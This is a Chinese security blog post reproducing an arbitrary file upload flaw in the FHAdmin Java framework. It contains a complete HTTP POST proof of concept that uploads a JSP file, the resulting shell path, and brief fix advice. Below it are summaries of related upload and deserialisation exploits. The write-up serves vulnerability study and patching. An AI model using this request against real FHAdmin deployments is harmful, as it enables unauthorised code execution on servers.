FHAdmin任意文件上传getShell渗透测试

最新推荐文章于 2022-04-01 19:52:08 发布
最新推荐文章于 2022-04-01 19:52:08 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 数据安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118199041
版权

简介

FHAdmin于2014年发布,由JAVA语言编写,是集成了代码生成、权限管理等基础功能的Java快速开发框架及平台,同时为适应技术的更新的迭代,也推出了更新框架和技术架构后的版本。

漏洞复现

任意文件上传
/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ 存在任意文件上传。

poc

POST //;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1
Accept-Encoding: gzip, deflate
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Connection: close
Host: xxxx
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://xxxx/fh_static_1/css/style.css
Content-Length: 175
Content-Type: multipart/form-data; boundary=653e1298053b919b8c365d524e9c45b3

--653e1298053b919b8c365d524e9c45b3
Content-Disposition: form-data; name="imgFile"; filename="1.jsp"
Content-Type: image/jpeg

hello
--653e1298053b919b8c365d524e9c45b3--

使用BP检测

最后访问地址是

http://xxx//;a/plugins/uploadify/2021062512120567679.jsp

修复建议

限制访问 升级最新版本

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
烽铃子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FH Admin Shiro反序列化漏洞复现
0xSec
12-02 1023
FH Admin CMS存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
【漏洞复现】云图图书馆集群管理系统 uploadfile 存在任意文件漏洞(4)
最新发布
2401_84972745的博客
05-13 139
云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件漏洞,攻击者可获取服务器权限。
Uploadfile 控件上文件的使用方法(js+jsp+后台)
qq_33458293的博客
12-14 1936
Jquery.Uploadify是JQuery的一个上插件,实现的效果非常不错,支持多文件、带进度显示。不过官方提供的实例时php版本的,本文将详细介绍Uploadify在js中的使用,您也可以点击下面的链接进行演示或下载。官方下载:http://www.uploadify.com/download/ 官方文档:http://www.uploadify.com/documentation/
FH Admin fhadmin
chiluyin1426的博客
08-22 448
转载于:https://my.oschina.net/fhadmin/blog/1518345
fhadmin后台权限管理
weixin_33670713的博客
09-01 1386
2019独角兽企业重金招聘Python工程师标准>>> ...
疯了..Spring 再爆惊天大漏洞。。
Java技术栈,分享最主流的Java技术
04-01 584
Spring 官宣高危漏洞 大家好,我是栈长。 前几天爆出来的 Spring 漏洞,刚修复完又来? 今天愚人节来了,这是和大家开玩笑吗? 不是的,我也是猝不及防!这个玩笑也开的太大了!! 你之前看到的这个漏洞已经是过去式了: 我以为是终点,没想到只是起点,现在 Spring 又官宣了最新的高危漏洞: Early Announcement??这只是一个早期的公告?可能还有中期?后期?往下面继续看就知道了! 漏洞详情 漏洞 CVE-2022-22965 漏洞名称 远程代码执行漏洞 严重级别
通达OA任意文件_文件包含GetShell1
08-03
在这个特定的案例中,提到的是一个存在于通达OA V11版本的安全漏洞,允许攻击者进行任意文件。 2. **任意文件漏洞** - 该漏洞使得攻击者能够绕过身份验证机制,上任意类型的文件到服务器。这通常是由于...
某集团任意文件下载到虚拟主机getshell的方法
09-30
本文将深入探讨如何利用某集团的任意文件下载漏洞实现对虚拟主机的getshell操作。首先,我们需要理解什么是任意文件下载以及它是如何产生的。任意文件下载通常发生在网站允许用户通过URL参数指定要下载的文件名,但...
ThinkSNS_V4 后台任意文件下载导致Getshell.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
ThinkCMF 任意内容包含getshell漏洞
10-26
2. 通过构造 a 参数的 fetch() 方法,在不需要知道文件路径的情况下就可以实现任意文件写入。 payload: 1. ?a=display&templateFile=README.md 2. ?a=fetch&templateFile=public/index&prefix=''&content=<php>...
java自动生成全套代码项目,可直接生成页面
08-20
不知道怎么上系统图片,java自动生成jsp,controller,service及实现类,mapper,操作简单,只需要自己在系统管理-代码生成里面进行操作即可,系统最后会导出具体操作文档,内自带mysql数据库脚本,源码需要在Tomcat7+jdk1.7环境下运行,ide可以支持主流的idea,eclipse,myeclipse,其它的我还没试过,绝对值得下载,登录用户名密码压缩文件中有,有不懂的可以留言我
文件漏洞训练平台.zip
10-14
攻击者通常会尝试上可执行文件(如PHP、ASP、JSP等)来获取Webshell,即所谓的"getshell",从而能够执行任意系统命令,危害网络安全。 第一关至第二十关的训练可能涵盖了以下知识点: 1. **基础验证检查**:了解...
springboot 全局异常拦截器,友好异常提示
07-24 959
1. 添加config 配置类 package org.fh.config; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.HandlerExceptionRes
uploadify文件实例
YYQ_QYY的专栏
09-30 513
需要引入的js文件和css文件:    <script type="text/javascript" src="plugins/uploadify/swfobject.js"> var jsessionid = "";  //勿删,uploadify兼容火狐用到 hTML文件文件: 保存 upload
fh admin mysql版本,SpringBoot 2.4.0 版本之后跨域的问题 处理
weixin_42133918的博客
03-19 113
package com.clickpaas.config;import org.springframework.context.annotation.Bean;import org.springframework.context.annotation.Configuration;import org.springframework.web.cors.CorsConfiguration;import...
FH Admin fhadmn 源码项目下载获取 Java后台 springmvc mybatis SSM
08-02 342
获取【下载地址】QQ: 313596790 官网 http://www.fhadmin.org/ A代码编辑器,在线模版编辑,仿开发工具编辑器,pdf在线预览,文件转换编码 B 集成代码生成器 [正反双向...
wordpress漏洞上php文件,WordPress Foxypress插件\'uploadify.php\'任意文件漏洞
weixin_39535125的博客
03-09 356
WordPress Foxypress插件\'uploadify.php\'任意文件漏洞信息来源:Sammy Forgit 发表日期:2013-05-01 14:59:00FoxyPress是WordPress博客软件插件。Foxypress 0.4.1.1-0.4.2.1版本的wp-content/plugins/foxypress/uploadify/uploadify.php脚...
【网络安全】记一次挖洞的日常
kali_Ma的博客
09-07 2225
前言:上个月月初开始,在那些项目结束之后进入了挖洞时期,每天的日常工作就是挖洞,除非有临时的项目才会停下,最近在整理报告,发现了这个站,还是挺有意思的。 信息收集 从fofa上找到了这个站点,叫做fastadmin,是基于Thinkphp5和bootstrap开发的后台框架,常规思路找一下后台,根据经验,没意外的话php的站点基本都是根路径后加个admin就可以找到了 getshell 常规手段弱口令先打一波,不行再试试SQL注入 弱口令admin/123456成功进入后台 因为结合了tp5框架,想到可能
久草cms 颜色网站 getshell 渗透
09-16
久草CMS是一款基于PHP开发的网站管理系统,用于构建和管理网站。而"getshell"意指通过系统漏洞或安全弱点成功获取对网站的控制权限。渗透测试指对系统进行安全评估,通过模拟黑客攻击的方式检测和发现系统的潜在安全风险。 首先,要进行久草CMS网站的渗透测试,我们需要确定目标和目的。渗透测试的目的可能是检测系统的安全性,发现潜在的漏洞并提出修复建议,以有效保护网站免受恶意攻击。 其次,我们可以使用一系列渗透测试工具和方法,来检测久草CMS网站的安全性。例如,可以使用漏洞扫描器来寻找系统中已知的漏洞,比如开源软件的已知漏洞或系统配置错误。此外,也可以进行弱口令猜解、文件漏洞测试、SQL注入测试等等,来寻找系统的潜在漏洞和安全弱点。 在进行渗透测试过程中,要求我们具备专业的知识和技能,并遵守相关法律法规和道德规范。渗透测试仅用于合法授权的目的,不能用于非法活动,如未经授权的攻击或破坏性测试。 最后,我们应该向网站管理员或开发者提供渗透测试的结果和建议,以便他们能够修复发现的漏洞和弱点。持续的监测和修复漏洞是确保网站安全的重要环节。 总之,对久草CMS颜色网站进行渗透测试是一项重要的安全评估工作,通过发现系统漏洞和弱点,可以帮助网站管理员和开发者加强对网站的安全性保护,从而保护用户的信息和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值